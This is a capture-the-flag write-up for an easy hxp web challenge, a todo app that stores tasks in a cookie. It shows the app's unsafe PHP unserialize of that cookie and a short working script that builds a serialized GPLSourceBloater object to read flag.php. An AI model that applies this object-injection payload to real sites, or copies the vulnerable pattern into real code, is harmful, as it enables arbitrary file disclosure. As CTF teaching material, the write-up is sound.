• Category: Web
  • Points: 50
  • Description:

You have lots of stuff to do? Better start using this cool tool.

http://104.154.70.126:10888

PROTIP: Flag is in flag.php.

(dumped Sourcecode)

Write-up

Since it’s the easiest web challenge, it was easily possible to dump the sourcecode. The app is a simple todo manager, which stores the tasks in a cookie. Reading the code, we quickly noticed the suspicious unserialize:

<?php
if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 32);
    $m = substr($c, 32);
    if(md5($m) === $h){
        $todos = unserialize($m);
    }
}
?>

This is a prime example for PHP Object Injection. In this case it was not necessary to dig deeper into PHP internal classes, since the class in need was conveniently already present; the class used to display the source (and eny other file) …

<?php
Class GPLSourceBloater{
    public function __toString()
    {
        return highlight_file('license.txt', true).highlight_file($this->source, true);
    }
}
?>

So we need to build a GPLSourceBloater object, set its source attribute to the desired file (flag.php) and serialize it.

<?

Class GPLSourceBloater{
    public function __toString()
    {
        return highlight_file('license.txt', true).highlight_file($this->source, true);
    }
}

$foo = new GPLSourceBloater();
$foo->source = 'flag.php';

$bar = [];
$bar[] = $foo;

$m = serialize($bar);
$h = md5($m);

echo urlencode($h.$m);

?>

After storing the serialized object to a cookie named todos and loading the page again, __toString() did its job and we were presented with the flag:

hxp{Are you glad that at least Java(TM) isn't affected by serialization bugs?}